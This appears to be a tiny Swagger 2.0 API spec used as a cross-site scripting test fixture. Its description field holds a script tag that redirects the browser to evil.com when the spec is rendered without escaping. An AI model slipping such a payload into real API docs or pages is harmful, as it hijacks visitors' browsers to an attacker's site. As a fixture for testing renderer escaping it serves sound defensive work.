swagger: '2.0'
info:
  title: XSS Test
  description: |
    <script>window.location.href="https://evil.com";</script>
paths:
  /test:
    get:
      responses:
        '200':
          description: Test XSS
